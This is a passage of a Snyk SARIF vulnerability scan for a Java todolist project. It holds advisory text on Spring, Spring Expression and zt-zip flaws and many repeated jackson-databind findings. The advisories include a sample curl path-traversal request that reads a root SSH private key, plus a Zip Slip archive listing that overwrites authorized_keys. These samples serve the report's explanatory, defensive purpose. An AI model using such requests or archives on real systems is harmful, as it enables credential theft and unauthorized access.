utilities.\n\nAffected versions of this package are vulnerable to Directory Traversal. It allows remote attackers to read arbitrary files via a crafted URL.\n\n# Details\n\nA Directory Traversal attack (also known as path traversal) aims to access files and directories that are stored outside the intended folder. By manipulating files with \"dot-dot-slash (../)\" sequences and its variations, or by using absolute file paths, it may be possible to access arbitrary files and directories stored on file system, including application source code, configuration, and other critical system files.\n\nDirectory Traversal vulnerabilities can be generally divided into two types:\n\n- **Information Disclosure**: Allows the attacker to gain information about the folder structure or read the contents of sensitive files on the system.\n\n`st` is a module for serving static files on web pages, and contains a [vulnerability of this type](https://snyk.io/vuln/npm:st:20140206). In our example, we will serve files from the `public` route.\n\nIf an attacker requests the following URL from our server, it will in turn leak the sensitive private key of the root user.\n\n```\ncurl http://localhost:8080/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/root/.ssh/id_rsa\n```\n**Note** `%2e` is the URL encoded version of `.` (dot).\n\n- **Writing arbitrary files**: Allows the attacker to create or replace existing files. This type of vulnerability is also known as `Zip-Slip`. \n\nOne way to achieve this is by using a malicious `zip` archive that holds path traversal filenames. When each filename in the zip archive gets concatenated to the target extraction folder, without validation, the final path ends up outside of the target folder. If an executable or a configuration file is overwritten with a file containing malicious code, the problem can turn into an arbitrary code execution issue quite easily.\n\nThe following is an example of a `zip` archive with one benign file and one malicious file. Extracting the malicious file will result in traversing out of the target folder, ending up in `/root/.ssh/` overwriting the `authorized_keys` file:\n\n```\n2018-04-15 22:04:29 ..... 19 19 good.txt\n2018-04-15 22:04:42 ..... 20 20 ../../../../../../root/.ssh/authorized_keys\n```\n\n# Remediation\nUpgrade `org.springframework:spring-core` to version 3.2.9.RELEASE, 4.0.5.RELEASE or higher.\n# References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/e3e71ba92a8b82dadf474eda76cd2741f65a77a8)\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/f6fddeb6eb7da625fd711ab371ff16512f431e8d)\n- [GitHub Issue](https://github.com/spring-projects/spring-framework/issues/16414)\n- [Jira Issue](https://jira.spring.io/browse/SPR-12354)\n- [JVNDB](http://jvndb.jvn.jp/en/contents/2014/JVNDB-2014-000054.html)\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-3578)\n- [Pivotal Security](https://pivotal.io/security/cve-2014-3578)\n- [Pivotal Security](http://www.pivotal.io/security/cve-2014-3578)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=1131882)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-22", + "maven" + ], + "cvssv3_baseScore": 5.3, + "security-severity": "5.3" + } + }, + { + "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-2434828", + "shortDescription": { + "text": "Medium severity - Denial of Service (DoS) vulnerability in org.springframework:spring-expression" + }, + "fullDescription": { + "text": "(CVE-2022-22950) org.springframework:spring-expression@3.2.6.RELEASE" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: org.springframework:spring-expression\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, org.springframework:spring-web@3.2.6.RELEASE and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › org.springframework:spring-web@3.2.6.RELEASE › org.springframework:spring-context@3.2.6.RELEASE › org.springframework:spring-expression@3.2.6.RELEASE\n# Overview\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) by providing a specially crafted SpEL expression, that might result in an `OutOfMemoryError`.\n\n# Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n# Remediation\nUpgrade `org.springframework:spring-expression` to version 5.2.20.RELEASE, 5.3.17 or higher.\n# References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/83ac65915871067c39a4fb255e0d484c785c0c11)\n- [GitHub Issue](https://github.com/spring-projects/spring-framework/issues/28145)\n- [Pivotal Security Advisory](https://pivotal.io/security/cve-2022-22950)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-400", + "maven" + ], + "cvssv3_baseScore": 5.3, + "security-severity": "5.3" + } + }, + { + "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-3369749", + "shortDescription": { + "text": "Medium severity - Allocation of Resources Without Limits or Throttling vulnerability in org.springframework:spring-expression" + }, + "fullDescription": { + "text": "(CVE-2023-20861) org.springframework:spring-expression@3.2.6.RELEASE" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: org.springframework:spring-expression\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, org.springframework:spring-web@3.2.6.RELEASE and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › org.springframework:spring-web@3.2.6.RELEASE › org.springframework:spring-context@3.2.6.RELEASE › org.springframework:spring-expression@3.2.6.RELEASE\n# Overview\n\nAffected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling via a crafted `SpEL` expression.\n# Remediation\nUpgrade `org.springframework:spring-expression` to version 5.2.23.RELEASE, 5.3.26, 6.0.7 or higher.\n# References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/430fc25acad2e85cbdddcd52b64481691f03ebd1)\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/52c93b1c4b24d70de233a958e60e7c5822bd274f)\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/935c29e3ddba5b19951e54f6685c70ed45d9cbe5)\n- [Vulnerability Advisory](https://spring.io/security/cve-2023-20861)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-770", + "maven" + ], + "cvssv3_baseScore": 5.3, + "security-severity": "5.3" + } + }, + { + "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-5422217", + "shortDescription": { + "text": "Medium severity - Allocation of Resources Without Limits or Throttling vulnerability in org.springframework:spring-expression" + }, + "fullDescription": { + "text": "(CVE-2023-20863) org.springframework:spring-expression@3.2.6.RELEASE" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: org.springframework:spring-expression\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, org.springframework:spring-web@3.2.6.RELEASE and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › org.springframework:spring-web@3.2.6.RELEASE › org.springframework:spring-context@3.2.6.RELEASE › org.springframework:spring-expression@3.2.6.RELEASE\n# Overview\n\nAffected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling when a user provides a very long `SpEL` expression.\n# Remediation\nUpgrade `org.springframework:spring-expression` to version 5.2.24.RELEASE, 5.3.27, 6.0.8 or higher.\n# References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/965a6392757d20f9db19241126fcc719a51eac15)\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/b73f5fcac22555f844cf27a7eeb876cb9d7f7f7e)\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/ebc82654282bda547fbc20a9749ab1bda886a46f)\n- [Vulnerability Advisory](https://spring.io/security/cve-2023-20863)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-770", + "maven" + ], + "cvssv3_baseScore": 6.5, + "security-severity": "6.5" + } + }, + { + "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-2823313", + "shortDescription": { + "text": "Medium severity - Denial of Service (DoS) vulnerability in org.springframework:spring-beans" + }, + "fullDescription": { + "text": "(CVE-2022-22970) org.springframework:spring-beans@3.2.6.RELEASE" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: org.springframework:spring-beans\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, org.springframework:spring-web@3.2.6.RELEASE and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › org.springframework:spring-web@3.2.6.RELEASE › org.springframework:spring-beans@3.2.6.RELEASE\n# Overview\n[org.springframework:spring-beans](https://www.baeldung.com/spring-bean) is a package that is the basis for Spring Framework's IoC container. The BeanFactory interface provides an advanced configuration mechanism capable of managing any type of object.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) if it relies on data binding to set a `MultipartFile` or `javax.servlet.Part` to a field in a model object.\n\n# Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n# Remediation\nUpgrade `org.springframework:spring-beans` to version 5.2.22.RELEASE, 5.3.20 or higher.\n# References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/50177b1ad3485bd44239b1756f6c14607476fcf2)\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/83186b689f11f5e6efe7ccc08fdeb92f66fcd583)\n- [Tanzu vmware](https://tanzu.vmware.com/security/cve-2022-22970)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-400", + "maven" + ], + "cvssv3_baseScore": 5.3, + "security-severity": "5.3" + } + }, + { + "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-2689634", + "shortDescription": { + "text": "Low severity - Improper Handling of Case Sensitivity vulnerability in org.springframework:spring-context" + }, + "fullDescription": { + "text": "(CVE-2022-22968) org.springframework:spring-context@3.2.6.RELEASE" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: org.springframework:spring-context\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, org.springframework:spring-web@3.2.6.RELEASE and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › org.springframework:spring-web@3.2.6.RELEASE › org.springframework:spring-context@3.2.6.RELEASE\n# Overview\n\nAffected versions of this package are vulnerable to Improper Handling of Case Sensitivity via the patterns for `disallowedFields` on a `DataBinder`. As a result, a field is not effectively protected unless it is listed with both upper and lower case for the first character of the field, including nested fields within the property path.\n# Remediation\nUpgrade `org.springframework:spring-context` to version 5.2.21, 5.3.19 or higher.\n# References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/833e750175349ab4fd502109a8b41af77e25cdea)\n- [GitHub Issue](https://github.com/spring-projects/spring-framework/issues/28333)\n- [PoC](https://github.com/MarcinGadz/spring-rce-poc)\n- [Spring Blog Post](https://spring.io/blog/2022/04/13/spring-framework-data-binding-rules-vulnerability-cve-2022-22968)\n- [Tanzu Advisory](https://tanzu.vmware.com/security/cve-2022-22968)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-178", + "maven" + ], + "cvssv3_baseScore": 3.7, + "security-severity": "3.7" + } + }, + { + "id": "SNYK-JAVA-ORGZEROTURNAROUND-31681", + "shortDescription": { + "text": "Medium severity - Arbitrary File Write via Archive Extraction (Zip Slip) vulnerability in org.zeroturnaround:zt-zip" + }, + "fullDescription": { + "text": "(CVE-2018-1002201) org.zeroturnaround:zt-zip@1.12" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: org.zeroturnaround:zt-zip\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT and org.zeroturnaround:zt-zip@1.12\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › org.zeroturnaround:zt-zip@1.12\n# Overview\r\n[`org.zeroturnaround:zt-zip`](https://github.com/zeroturnaround/zt-zip) is a library that helps to create, modify or extract ZIP archives.\r\n\r\nAffected versions of the package are vulnerable to Arbitrary File Write via Archive Extraction (AKA \"Zip Slip\").\r\n\r\nIt is exploited using a specially crafted zip archive, that holds path traversal filenames. When exploited, a filename in a malicious archive is concatenated to the target extraction directory, which results in the final path ending up outside of the target folder. For instance, a zip may hold a file with a \"../../file.exe\" location and thus break out of the target folder. If an executable or a configuration file is overwritten with a file containing malicious code, the problem can turn into an arbitrary code execution issue quite easily.\r\n\r\nThe following is an example of a zip archive with one benign file and one malicious file. Extracting the malicous file will result in traversing out of the target folder, ending up in `/root/.ssh/` overwriting the `authorized_keys` file:\r\n\r\n```\r\n\r\n+2018-04-15 22:04:29 ..... 19 19 good.txt\r\n\r\n+2018-04-15 22:04:42 ..... 20 20 ../../../../../../root/.ssh/authorized_keys\r\n\r\n```\r\n\r\n# Vulnerable Method\r\nThis vulnerability appears in method `process` under class name `Unpacker` in `org/zeroturnaround/zip/ZipUtil.java` [[1]](https://github.com/zeroturnaround/zt-zip/commit/759b72f33bc8f4d69f84f09fcb7f010ad45d6fff)\r\n\r\n\r\n# Remediation\r\nUpgrade `org.zeroturnaround:zt-zip` to version 1.13 or higher.\n\n# References\n- [https://github.com/zeroturnaround/zt-zip/commit/759b72f33bc8f4d69f84f09fcb7f010ad45d6fff](https://github.com/zeroturnaround/zt-zip/commit/759b72f33bc8f4d69f84f09fcb7f010ad45d6fff)\n- [https://github.com/snyk/zip-slip-vulnerability](https://github.com/snyk/zip-slip-vulnerability)\n- [https://security.snyk.io/research/zip-slip-vulnerability](https://security.snyk.io/research/zip-slip-vulnerability)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-29", + "maven" + ], + "cvssv3_baseScore": 5.5, + "security-severity": "5.5" + } + } + ] + } + }, + "results": [ + { + "ruleId": "SNYK-JAVA-C3P0-461018", + "level": "error", + "message": { + "text": "This file introduces a vulnerable c3p0:c3p0 package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "c3p0:c3p0@0.9.1.2" + } + ] + } + ] + }, + { + "ruleId": "snyk:lic:maven:c3p0:c3p0:LGPL-3.0", + "level": "error", + "message": { + "text": "This file introduces a vulnerable c3p0:c3p0 package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "c3p0:c3p0@0.9.1.2" + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1009829", + "level": "error", + "message": { + "text": "This file introduces a vulnerable com.fasterxml.jackson.core:jackson-databind package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "com.fasterxml.jackson.core:jackson-databind@2.6.5" + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1047324", + "level": "error", + "message": { + "text": "This file introduces a vulnerable com.fasterxml.jackson.core:jackson-databind package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "com.fasterxml.jackson.core:jackson-databind@2.6.5" + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1048302", + "level": "error", + "message": { + "text": "This file introduces a vulnerable com.fasterxml.jackson.core:jackson-databind package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "com.fasterxml.jackson.core:jackson-databind@2.6.5" + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1052449", + "level": "error", + "message": { + "text": "This file introduces a vulnerable com.fasterxml.jackson.core:jackson-databind package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "com.fasterxml.jackson.core:jackson-databind@2.6.5" + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1052450", + "level": "error", + "message": { + "text": "This file introduces a vulnerable com.fasterxml.jackson.core:jackson-databind package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "com.fasterxml.jackson.core:jackson-databind@2.6.5" + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1054588", + "level": "error", + "message": { + "text": "This file introduces a vulnerable com.fasterxml.jackson.core:jackson-databind package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "com.fasterxml.jackson.core:jackson-databind@2.6.5" + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056414", + "level": "error", + "message": { + "text": "This file introduces a vulnerable com.fasterxml.jackson.core:jackson-databind package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "com.fasterxml.jackson.core:jackson-databind@2.6.5" + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056416", + "level": "error", + "message": { + "text": "This file introduces a vulnerable com.fasterxml.jackson.core:jackson-databind package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "com.fasterxml.jackson.core:jackson-databind@2.6.5" + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056417", + "level": "error", + "message": { + "text": "This file introduces a vulnerable com.fasterxml.jackson.core:jackson-databind package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "com.fasterxml.jackson.core:jackson-databind@2.6.5" + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056418", + "level": "error", + "message": { + "text": "This file introduces a vulnerable com.fasterxml.jackson.core:jackson-databind package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "com.fasterxml.jackson.core:jackson-databind@2.6.5" + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056419", + "level": "error", + "message": { + "text": "This file introduces a vulnerable com.fasterxml.jackson.core:jackson-databind package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "com.fasterxml.jackson.core:jackson-databind@2.6.5" + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056420", + "level": "error", + "message": { + "text": "This file introduces a vulnerable com.fasterxml.jackson.core:jackson-databind package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "com.fasterxml.jackson.core:jackson-databind@2.6.5" + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056421", + "level": "error", + "message": { + "text": "This file introduces a vulnerable com.fasterxml.jackson.core:jackson-databind package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "com.fasterxml.jackson.core:jackson-databind@2.6.5" + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056424", + "level": "error", + "message": { + "text": "This file introduces a vulnerable com.fasterxml.jackson.core:jackson-databind package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "com.fasterxml.jackson.core:jackson-databind@2.6.5" + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056425", + "level": "error", + "message": { + "text": "This file introduces a vulnerable com.fasterxml.jackson.core:jackson-databind package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "com.fasterxml.jackson.core:jackson-databind@2.6.5" + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056426", + "level": "error", + "message": { + "text": "This file introduces a vulnerable com.fasterxml.jackson.core:jackson-databind package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "com.fasterxml.jackson.core:jackson-databind@2.6.5" + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056427", + "level": "error", + "message": { + "text": "This file introduces a vulnerable com.fasterxml.jackson.core:jackson-databind package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "com.fasterxml.jackson.core:jackson-databind@2.6.5" + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1061931", + "level": "error", + "message": { + "text": "This file introduces a vulnerable com.fasterxml.jackson.core:jackson-databind package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "com.fasterxml.jackson.core:jackson-databind@2.6.5" + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-174736", + "level": "error", + "message": { + "text": "This file introduces a vulnerable com.fasterxml.jackson.core:jackson-databind package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "com.fasterxml.jackson.core:jackson-databind@2.6.5" + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-2421244", + "level": "error", + "message": { + "text": "This file introduces a vulnerable com.fasterxml.jackson.core:jackson-databind package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "com.fasterxml.jackson.core:jackson-databind@2.6.5" + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-3038424", + "level": "warning", + "message": { + "text": "This file introduces a vulnerable com.fasterxml.jackson.core:jackson-databind package with a medium severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "com.fasterxml.jackson.core:jackson-databind@2.6.5" + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-3038426", + "level": "warning", + "message": { + "text": "This file introduces a vulnerable com.fasterxml.jackson.core:jackson-databind package with a medium severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "com.fasterxml.jackson.core:jackson-databind@2.6.5" + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507", + "level": "error", + "message": { + "text": "This file introduces a vulnerable com.fasterxml.jackson.core:jackson-databind package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "com.fasterxml.jackson.core:jackson-databind@2.6.5" + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-31573", + "level": "error", + "message": { + "text": "This file introduces a vulnerable com.fasterxml.jackson.core:jackson-databind package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "com.fasterxml.jackson.core:jackson-databind@2.6.5" + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-32043", + "level": "error", + "message": { + "text": "This file introduces a vulnerable com.fasterxml.jackson.core:jackson-databind package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "com.fasterxml.jackson.core:jackson-databind@2.6.5" + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-32044", + "level": "error", + "message": { + "text": "This file introduces a vulnerable com.fasterxml.jackson.core:jackson-databind package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "com.fasterxml.jackson.core:jackson-databind@2.6.5" + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-32111", + "level": "error", + "message": { + "text": "This file introduces a vulnerable com.fasterxml.jackson.core:jackson-databind package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "com.fasterxml.jackson.core:jackson-databind@2.6.5" + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-450207", + "level": "warning", + "message": { + "text": "This file introduces a vulnerable com.fasterxml.jackson.core:jackson-databind package with a medium severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "com.fasterxml.jackson.core:jackson-databind@2.6.5" + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-450917", + "level": "error", + "message": { + "text": "This file introduces a vulnerable com.fasterxml.jackson.core:jackson-databind package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "com.fasterxml.jackson.core:jackson-databind@2.6.5" + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-455617", + "level": "error", + "message": { + "text": "This file introduces a vulnerable com.fasterxml.jackson.core:jackson-databind package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "com.fasterxml.jackson.core:jackson-databind@2.6.5" + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-467014", + "level": "error", + "message": { + "text": "This file introduces a vulnerable com.fasterxml.jackson.core:jackson-databind package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + 